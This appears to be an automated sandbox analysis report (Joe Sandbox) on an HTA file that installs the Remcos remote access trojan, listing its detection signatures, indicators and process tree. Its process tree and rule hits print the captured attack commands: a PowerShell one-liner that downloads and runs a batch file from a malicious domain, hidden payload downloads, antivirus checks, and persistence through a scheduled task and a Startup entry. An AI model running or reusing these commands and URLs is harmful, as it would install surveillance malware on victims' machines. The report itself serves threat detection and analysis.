Edit tour

Windows Analysis Report
c.hta

Overview

General Information

Sample name:	c.hta
Analysis ID:	1589383
MD5:	4fadf00aa57b7ca6bcb6b02cb338c0b2
SHA1:	ceb81e97c94c5655d1743114044f505184ddead2
SHA256:	8da5bb4d9cfd29718720e839bb75ee58f92b6e41f0181b6eede4234d3122dab6
Tags:	htauser-abuse_ch
Infos:

Detection

Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected Remcos RAT

Multi AV Scanner detection for dropped file

Sigma detected: Drops script at startup location

Sigma detected: Remcos

Sigma detected: Search for Antivirus process

AI detected suspicious sample

Drops PE files with a suspicious file extension

Drops large PE files

Found API chain indicative of sandbox detection

Installs a global keyboard hook

Loading BitLocker PowerShell Module

Powershell drops PE file

Sigma detected: HackTool - CACTUSTORCH Remote Thread Creation

Sigma detected: Powerup Write Hijack DLL

Sigma detected: Rare Remote Thread Creation By Uncommon Source Image

Sigma detected: Suspicious Command Patterns In Scheduled Task Creation

Sigma detected: Suspicious Invoke-WebRequest Execution

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Suspicious powershell command line found

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Wscript called in batch mode (surpress errors)

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: PowerShell Web Download

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

mshta.exe (PID: 7260 cmdline: mshta.exe "C:\Users\user\Desktop\c.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)

powershell.exe (PID: 7388 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;$u='https://candwfarmsllc.com/c2.bat';$o=$env:TEMP + '\c2.bat';Invoke-WebRequest -Uri $u -OutFile $o;Start-Process -FilePath $o -NoNewWindow" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7580 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c2.bat"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

powershell.exe (PID: 7596 cmdline: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

Acrobat.exe (PID: 7776 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)

AcroCEF.exe (PID: 8052 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

AcroCEF.exe (PID: 3912 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1576,i,16045763869341166772,13330645250121151550,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

powershell.exe (PID: 7892 cmdline: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

powershell.exe (PID: 8492 cmdline: powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

msword.exe (PID: 8876 cmdline: msword.exe MD5: 0DE162AA65BC5DAE2145333A0D1F8801)

cmd.exe (PID: 8940 cmdline: "C:\Windows\System32\cmd.exe" /c move Nr Nr.cmd & Nr.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 8996 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 9004 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 9060 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 9068 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 9104 cmdline: cmd /c md 361684 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

extrac32.exe (PID: 9120 cmdline: extrac32 /Y /E Approaches MD5: 9472AAB6390E4F1431BAA912FCFF9707)

findstr.exe (PID: 9140 cmdline: findstr /V "Korea" Measurement MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 9156 cmdline: cmd /c copy /b 361684\Propose.com + Different + Constitute + Instantly + Led + Indonesia + Dressing + Missed + Brian + Clinton + Protocol 361684\Propose.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 9172 cmdline: cmd /c copy /b ..\Next + ..\Math + ..\Blocked + ..\Leisure + ..\Substantial + ..\Beam + ..\Cocks + ..\David + ..\Undefined + ..\Realm U MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Propose.com (PID: 9188 cmdline: Propose.com U MD5: 62D09F076E6E0240548C2F837536A46A)

cmd.exe (PID: 5796 cmdline: cmd /c schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 3096 cmdline: schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 6780 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & echo URL="C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

choice.exe (PID: 9204 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

wscript.exe (PID: 7992 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

LinkHub.com (PID: 8412 cmdline: "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y" MD5: 62D09F076E6E0240548C2F837536A46A)

wscript.exe (PID: 7260 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

LinkHub.com (PID: 7988 cmdline: "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y" MD5: 62D09F076E6E0240548C2F837536A46A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Sigma Signatures

System Summary

Sigma detected: HackTool - CACTUSTORCH Remote Thread Creation

Source: Threat created

Author: @SBousseaden (detection), Thomas Patzke (rule): Data: EventID: 8, SourceImage: C:\Windows\System32\wscript.exe, SourceProcessId: 7260, StartAddress: FB43BCC0, TargetImage: C:\Windows\SysWOW64\mshta.exe, TargetProcessId: 7260

Sigma detected: Powerup Write Hijack DLL

Source: File created

Author: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7388, TargetFilename: C:\Users\user\AppData\Local\Temp\c2.bat

Sigma detected: Rare Remote Thread Creation By Uncommon Source Image

Source: Threat created

Author: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\wscript.exe, SourceProcessId: 7260, StartAddress: FB43BCC0, TargetImage: C:\Windows\SysWOW64\mshta.exe, TargetProcessId: 7260

Sigma detected: Suspicious Command Patterns In Scheduled Task Creation

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5796, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, ProcessId: 3096, ProcessName: schtasks.exe

Sigma detected: Suspicious Invoke-WebRequest Execution

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;$u='https://candwfarmsllc.com/c2.bat';$o=$env:TEMP + '\c2.bat';Invoke-WebRequest -Uri $u -OutFile $o;Start-Process -FilePath $o -NoNewWindow", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;$u='https://candwfarmsllc.com/c2.bat';$o=$env:TEMP + '\c2.bat';Invoke-WebRequest -Uri $u -OutFile $o;Start-Process -FilePath $o -NoNewWindow", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\c.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7260, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;$u='https://candwfarmsllc.com/c2.bat';$o=$env:TEMP + '\c2.bat';Invoke-WebRequest -Uri $u -OutFile $o;Start-Process -FilePath $o -NoNewWindow", ProcessId: 7388, ProcessName: powershell.exe

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;$u='https://candwfarmsllc.com/c2.bat';$o=$env:TEMP + '\c2.bat';Invoke-WebRequest -Uri $u -OutFile $o;Start-Process -FilePath $o -NoNewWindow", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;$u='https://candwfarmsllc.com/c2.bat';$o=$env:TEMP + '\c2.bat';Invoke-WebRequest -Uri $u -OutFile $o;Start-Process -FilePath $o -NoNewWindow", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\c.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7260, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;$u='https://candwfarmsllc.com/c2.bat';$o=$env:TEMP + '\c2.bat';Invoke-WebRequest -Uri $u -OutFile $o;Start-Process -FilePath $o -NoNewWindow", ProcessId: 7388, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c2.bat"", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7580, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", ProcessId: 7892, ProcessName: powershell.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js", ProcessId: 7992, ProcessName: wscript.exe

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7388, TargetFilename: C:\Users\user\AppData\Local\Temp\c2.bat

Sigma detected: PowerShell Web Download

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;$u='https://candwfarmsllc.com/c2.bat';$o=$env:TEMP + '\c2.bat';Invoke-WebRequest -Uri $u -OutFile $o;Start-Process -FilePath $o -NoNewWindow", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;$u='https://candwfarmsllc.com/c2.bat';$o=$env:TEMP + '\c2.bat';Invoke-WebRequest -Uri $u -OutFile $o;Start-Process -FilePath $o -NoNewWindow", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\c.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7260, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;$u='https://candwfarmsllc.com/c2.bat';$o=$env:TEMP + '\c2.bat';Invoke-WebRequest -Uri $u -OutFile $o;Start-Process -FilePath $o -NoNewWindow", ProcessId: 7388, ProcessName: powershell.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;$u='https://candwfarmsllc.com/c2.bat';$o=$env:TEMP + '\c2.bat';Invoke-WebRequest -Uri $u -OutFile $o;Start-Process -FilePath $o -NoNewWindow", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;$u='https://candwfarmsllc.com/c2.bat';$o=$env:TEMP + '\c2.bat';Invoke-WebRequest -Uri $u -OutFile $o;Start-Process -FilePath $o -NoNewWindow", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\c.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7260, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;$u='https://candwfarmsllc.com/c2.bat';$o=$env:TEMP + '\c2.bat';Invoke-WebRequest -Uri $u -OutFile $o;Start-Process -FilePath $o -NoNewWindow", ProcessId: 7388, ProcessName: powershell.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js", ProcessId: 7992, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;$u='https://candwfarmsllc.com/c2.bat';$o=$env:TEMP + '\c2.bat';Invoke-WebRequest -Uri $u -OutFile $o;Start-Process -FilePath $o -NoNewWindow", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;$u='https://candwfarmsllc.com/c2.bat';$o=$env:TEMP + '\c2.bat';Invoke-WebRequest -Uri $u -OutFile $o;Start-Process -FilePath $o -NoNewWindow", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\c.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7260, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;$u='https://candwfarmsllc.com/c2.bat';$o=$env:TEMP + '\c2.bat';Invoke-WebRequest -Uri $u -OutFile $o;Start-Process -FilePath $o -NoNewWindow", ProcessId: 7388, ProcessName: powershell.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 6780, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Nr Nr.cmd & Nr.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8940, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 9068, ProcessName: findstr.exe

Stealing of Sensitive Information

Sigma detected: Remcos

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com, ProcessId: 9188, TargetFilename: C:\ProgramData\remcos\logs.dat

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://myguyapp.com/W2.pdfUSERDOMAIN=FACWLRWUSERDOMAIN	Avira URL Cloud: Label: phishing
Source: https://myguyapp.com/W2.pdf8	Avira URL Cloud: Label: phishing
Source: https://myguyapp.com/msword.zi	Avira URL Cloud: Label: phishing
Source: https://myguyapp.com/msword.zip:	Avira URL Cloud: Label: phishing
Source: https://myguyapp.com/msword.zipsH	Avira URL Cloud: Label: phishing
Source: https://myguyapp.com/W2.pdfUSERDOMAIN=FACWLRWUSERD	Avira URL Cloud: Label: phishing
Source: https://myguyapp.com/W2.pdfl	Avira URL Cloud: Label: phishing
Source: https://myguyapp.com/W2.pdfqH	Avira URL Cloud: Label: phishing
Source: https://candwfarmsllc.com/c2.bat	Avira URL Cloud: Label: malware
Source: https://myguyapp.com/msword.zipurl2=h	Avira URL Cloud: Label: phishing
Source: https://myguyapp.com/W2.pdfUSERDOMAIN=FACWLR	Avira URL Cloud: Label: phishing
Source: https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSERDOMAIN=FACWLRWUSERDOMAIN_ROA	Avira URL Cloud: Label: phishing
Source: https://myguyapp.com/mB	Avira URL Cloud: Label: phishing
Source: https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSERDOMAIN=FACWLRWUSERDOMAIN_ROAMINGP	Avira URL Cloud: Label: phishing
Source: https://myguyapp.com/msword.zipzS	Avira URL Cloud: Label: phishing
Source: https://myguyapp.com/msword.zipi	Avira URL Cloud: Label: phishing
Source: https://myguyapp.com/msword.zipj	Avira URL Cloud: Label: phishing
Source: https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSE	Avira URL Cloud: Label: phishing
Source: https://myguyapp.com/W2.pdfxS	Avira URL Cloud: Label: phishing

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

ReversingLabs: Detection: 15%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.1% probability

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 16_2_004062D5 FindFirstFileW,FindClose,	16_2_004062D5
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 16_2_00402E18 FindFirstFileW,	16_2_00402E18
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 16_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	16_2_00406C9B
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00E4A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	36_2_00E4A087
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00E4A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	36_2_00E4A1E2
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00E3E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	36_2_00E3E472
